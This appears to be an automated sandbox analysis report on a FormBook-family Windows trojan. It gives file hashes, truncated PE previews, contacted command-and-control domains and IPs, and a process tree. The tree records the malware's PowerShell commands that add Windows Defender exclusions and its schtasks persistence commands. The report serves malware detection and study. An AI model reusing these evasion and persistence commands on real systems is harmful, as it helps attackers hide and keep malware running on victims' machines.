                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......c..............0.................. ... ....@.. .......................`............@.....................................O.... .......................@....................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H.......<...........l...8u..............................................^..}.....(.......(.....*.0...........s......o......(.....*...0...........s......o......(.....*...0...........s......o......(.....*...0...........s......o......(.....*...0..+.........,..{.......+....,...{....o........(.....*..0..r.............(....s......s....}.....s....}.....s....}.....s....}.....(......{....(....o......{.....o......{.....o .....{....r...p"..@A...s!...o".....{....(#...o$.....{.... .... ..

                                                          C:\Users\user\AppData\Roaming\FqJXaFxwEj.exe:Zone.Identifier

                                                          Download File
                                                          Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):26
                                                          Entropy (8bit):3.95006375643621
                                                          Encrypted:false
                                                          SSDEEP:3:ggPYV:rPYV
                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                          Malicious:true
                                                          Preview:[ZoneTransfer]....ZoneId=0

                                                          Static File Info

                                                          General

                                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Entropy (8bit):7.637536160349333
                                                          TrID:
                                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                          • Win32 Executable (generic) a (10002005/4) 49.75%
                                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                          • Windows Screen Saver (13104/52) 0.07%
                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                          File name:SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe
                                                          File size:914944
                                                          MD5:55d6460392408d1325c18b69a91c28e3
                                                          SHA1:405847d03be406a0025eda76852dfd46420a8d7a
                                                          SHA256:d1e9780a620ddf149c2aed319388bca7ed690c2a58c9ffc8f60b1c4515115dc9
                                                          SHA512:d0795dbf40d938ef236ef04a21836a95b49357d7a8f627e346bcace64e36ef8e3399c110d49fa5153f232938d0c5acfa197f8fbba9a15ea3bc50945287703c10
                                                          SSDEEP:12288:0cAqU+IQ+9ex4JzGcE3mcN553siNii9+M7SJNlMQ8LYbm8fv+/nFRDdzoa1cfN:dB+NdrE3mID3hlnSZMQ8UP+/FRDdEPf
                                                          TLSH:3815DF8033A6AF72F568A7F37811814867763C6EA5F1D2285DDEB0DE2672B4049F1B13
                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......c..............0.................. ... ....@.. .......................`............@................................

                                                          File Icon

                                                          Icon Hash:00828e8e8686b000

                                                          Static PE Info

                                                          General

                                                          Entrypoint:0x4e0c0a
                                                          Entrypoint Section:.text
                                                          Digitally signed:false
                                                          Imagebase:0x400000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                          Time Stamp:0x6385AB92 [Tue Nov 29 06:49:54 2022 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:
                                                          OS Version Major:4
                                                          OS Version Minor:0
                                                          File Version Major:4
                                                          File Version Minor:0
                                                          Subsystem Version Major:4
                                                          Subsystem Version Minor:0
                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                          Entrypoint Preview

                                                          Instruction
                                                          jmp dword ptr [00402000h]
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al

                                                          Data Directories

                                                          NameVirtual AddressVirtual Size Is in Section
                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0xe0bb80x4f.text
                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0xe20000x388.rsrc
                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0xe40000xc.reloc
                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                          Sections

                                                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                          .text0x20000xdec100xdee00False0.82092045534212data7.644411619658559IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                          .rsrc0xe20000x3880x400False0.3701171875data2.8517259772227463IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                          .reloc0xe40000xc0x200False0.044921875data0.07763316234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                          Resources

                                                          NameRVASizeTypeLanguageCountry
                                                          RT_VERSION0xe20580x32cdata

                                                          Imports

                                                          DLLImport
                                                          mscoree.dll_CorExeMain

                                                          Network Behavior

                                                          Network Port Distribution

                                                          TCP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Nov 29, 2022 10:43:45.623158932 CET4969780192.168.2.4103.193.185.8
                                                          Nov 29, 2022 10:43:45.951808929 CET8049697103.193.185.8192.168.2.4
                                                          Nov 29, 2022 10:43:45.952020884 CET4969780192.168.2.4103.193.185.8
                                                          Nov 29, 2022 10:43:45.952260971 CET4969780192.168.2.4103.193.185.8
                                                          Nov 29, 2022 10:43:46.280527115 CET8049697103.193.185.8192.168.2.4
                                                          Nov 29, 2022 10:43:46.286369085 CET8049697103.193.185.8192.168.2.4
                                                          Nov 29, 2022 10:43:46.286412954 CET8049697103.193.185.8192.168.2.4
                                                          Nov 29, 2022 10:43:46.286636114 CET4969780192.168.2.4103.193.185.8
                                                          Nov 29, 2022 10:43:46.286794901 CET4969780192.168.2.4103.193.185.8
                                                          Nov 29, 2022 10:43:46.615053892 CET8049697103.193.185.8192.168.2.4

                                                          UDP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Nov 29, 2022 10:43:45.359435081 CET5091153192.168.2.48.8.8.8
                                                          Nov 29, 2022 10:43:45.616997957 CET53509118.8.8.8192.168.2.4
                                                          Nov 29, 2022 10:43:51.664194107 CET5968353192.168.2.48.8.8.8
                                                          Nov 29, 2022 10:43:51.709604025 CET53596838.8.8.8192.168.2.4

                                                          DNS Queries

                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                          Nov 29, 2022 10:43:45.359435081 CET192.168.2.48.8.8.80x8b5fStandard query (0)www.somethingyourselves.comA (IP address)IN (0x0001)false
                                                          Nov 29, 2022 10:43:51.664194107 CET192.168.2.48.8.8.80x7543Standard query (0)www.alrt.infoA (IP address)IN (0x0001)false

                                                          DNS Answers

                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                          Nov 29, 2022 10:43:45.616997957 CET8.8.8.8192.168.2.40x8b5fNo error (0)www.somethingyourselves.com103.193.185.8A (IP address)IN (0x0001)false
                                                          Nov 29, 2022 10:43:51.709604025 CET8.8.8.8192.168.2.40x7543No error (0)www.alrt.info80.92.205.131A (IP address)IN (0x0001)false

                                                          HTTP Request Dependency Graph

                                                          • www.somethingyourselves.com

                                                          Statistics

                                                          Behavior

                                                          Click to jump to process

                                                          System Behavior

                                                          General

                                                          Target ID:0
                                                          Start time:10:41:45
                                                          Start date:29/11/2022
                                                          Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe
                                                          Imagebase:0x960000
                                                          File size:914944 bytes
                                                          MD5 hash:55D6460392408D1325C18B69A91C28E3
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:.Net C# or VB.NET
                                                          Yara matches:
                                                          • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.359675878.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.361866159.0000000003151000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          Reputation:low

                                                          General

                                                          Target ID:1
                                                          Start time:10:41:54
                                                          Start date:29/11/2022
                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe
                                                          Imagebase:0x180000
                                                          File size:430592 bytes
                                                          MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:.Net C# or VB.NET
                                                          Reputation:high

                                                          General

                                                          Target ID:2
                                                          Start time:10:41:54
                                                          Start date:29/11/2022
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff7c72c0000
                                                          File size:625664 bytes
                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          General

                                                          Target ID:3
                                                          Start time:10:41:56
                                                          Start date:29/11/2022
                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\FqJXaFxwEj.exe
                                                          Imagebase:0x180000
                                                          File size:430592 bytes
                                                          MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:.Net C# or VB.NET
                                                          Reputation:high

                                                          General

                                                          Target ID:4
                                                          Start time:10:41:56
                                                          Start date:29/11/2022
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff7c72c0000
                                                          File size:625664 bytes
                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          General

                                                          Target ID:5
                                                          Start time:10:41:56
                                                          Start date:29/11/2022
                                                          Path:C:\Windows\SysWOW64\schtasks.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FqJXaFxwEj" /XML "C:\Users\user\AppData\Local\Temp\tmp4724.tmp
                                                          Imagebase:0xd20000
                                                          File size:185856 bytes
                                                          MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          General

                                                          Target ID:6
                                                          Start time:10:41:57
                                                          Start date:29/11/2022
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff7c72c0000
                                                          File size:625664 bytes
                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          General

                                                          Target ID:7
                                                          Start time:10:41:59
                                                          Start date:29/11/2022
                                                          Path:C:\Users\user\AppData\Roaming\FqJXaFxwEj.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Users\user\AppData\Roaming\FqJXaFxwEj.exe
                                                          Imagebase:0x8a0000
                                                          File size:914944 bytes
                                                          MD5 hash:55D6460392408D1325C18B69A91C28E3
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:.Net C# or VB.NET
                                                          Yara matches:
                                                          • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000007.00000002.390890604.00000000030C0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000007.00000002.388062952.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          Antivirus matches:
                                                          • Detection: 100%, Joe Sandbox ML
                                                          • Detection: 29%, ReversingLabs

                                                          General

                                                          Target ID:9
                                                          Start time:10:42:06
                                                          Start date:29/11/2022
                                                          Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe
                                                          Imagebase:0xe40000
                                                          File size:914944 bytes
                                                          MD5 hash:55D6460392408D1325C18B69A91C28E3
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.361014158.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.361014158.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.361014158.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.361014158.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group

                                                          General

                                                          Target ID:10
                                                          Start time:10:42:16
                                                          Start date:29/11/2022
                                                          Path:C:\Windows\SysWOW64\schtasks.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FqJXaFxwEj" /XML "C:\Users\user\AppData\Local\Temp\tmp8C7A.tmp
                                                          Imagebase:0xd20000
                                                          File size:185856 bytes
                                                          MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Target ID:11
                                                          Start time:10:42:16
                                                          Start date:29/11/2022
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff7c72c0000
                                                          File size:625664 bytes
                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Target ID:12
                                                          Start time:10:42:17
                                                          Start date:29/11/2022
                                                          Path:C:\Users\user\AppData\Roaming\FqJXaFxwEj.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Users\user\AppData\Roaming\FqJXaFxwEj.exe
                                                          Imagebase:0x70000
                                                          File size:914944 bytes
                                                          MD5 hash:55D6460392408D1325C18B69A91C28E3
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Target ID:13
                                                          Start time:10:42:17
                                                          Start date:29/11/2022
                                                          Path:C:\Users\user\AppData\Roaming\FqJXaFxwEj.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Users\user\AppData\Roaming\FqJXaFxwEj.exe
                                                          Imagebase:0x7ff6992e0000
                                                          File size:914944 bytes
                                                          MD5 hash:55D6460392408D1325C18B69A91C28E3
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.501723041.0000000001870000.00000040.10000000.00040000.00000000.sdmp, Author: unknown

                                                          General

                                                          Target ID:14
                                                          Start time:10:42:23
                                                          Start date:29/11/2022
                                                          Path:C:\Windows\explorer.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\Explorer.EXE
                                                          Imagebase:0x7ff618f60000
                                                          File size:3933184 bytes
                                                          MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000000.488142164.000000000D8E1000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000E.00000000.488142164.000000000D8E1000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000000.488142164.000000000D8E1000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000000.488142164.000000000D8E1000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000000.461184066.000000000D8E1000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000E.00000000.461184066.000000000D8E1000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000000.461184066.000000000D8E1000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000000.461184066.000000000D8E1000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group

                                                          General

                                                          Target ID:17
                                                          Start time:10:43:12
                                                          Start date:29/11/2022
                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Windows\SysWOW64\cmd.exe
                                                          Imagebase:0xd90000
                                                          File size:232960 bytes
                                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.573699141.0000000000CF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000011.00000002.573699141.0000000000CF0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.573699141.0000000000CF0000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.573699141.0000000000CF0000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.574248356.0000000003260000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000011.00000002.574248356.0000000003260000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.574248356.0000000003260000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.574248356.0000000003260000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.574000727.00000000030D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000011.00000002.574000727.00000000030D0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.574000727.00000000030D0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.574000727.00000000030D0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group

                                                          Disassembly

                                                          No disassembly